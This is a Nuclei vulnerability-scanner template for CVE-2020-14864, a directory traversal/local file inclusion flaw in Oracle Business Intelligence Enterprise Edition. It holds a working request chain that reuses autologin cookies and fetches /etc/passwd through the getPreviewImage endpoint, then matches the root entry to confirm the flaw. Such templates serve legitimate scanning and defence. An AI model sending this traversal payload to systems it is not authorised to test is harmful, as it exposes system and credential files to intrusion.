nuclei-templates/cves/2020/CVE-2020-14864.yaml

26 lines
920 B
YAML

id: CVE-2020-14864
info:
name: Oracle Fusion - "getPreviewImage" Directory Traversal/Local File Inclusion
description: 'Oracle Business Intelligence Enterprise Edition 5.5.0.0.0 / 12.2.1.3.0 / 12.2.1.4.0 - "getPreviewImage" Directory Traversal/Local File Inclusion'
author: Ivo Palazzolo (@palaziv)
cvss: 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'
severity: high
tags: cve,cve2020,oracle,traversal
requests:
- method: GET
headers:
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
path:
- '{{BaseURL}}/analytics/saw.dll?bieehome&startPage=1' # grab autologin cookies
- '{{BaseURL}}/analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd'
cookie-reuse: true
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- 'root:[x*]:0:0'
part: body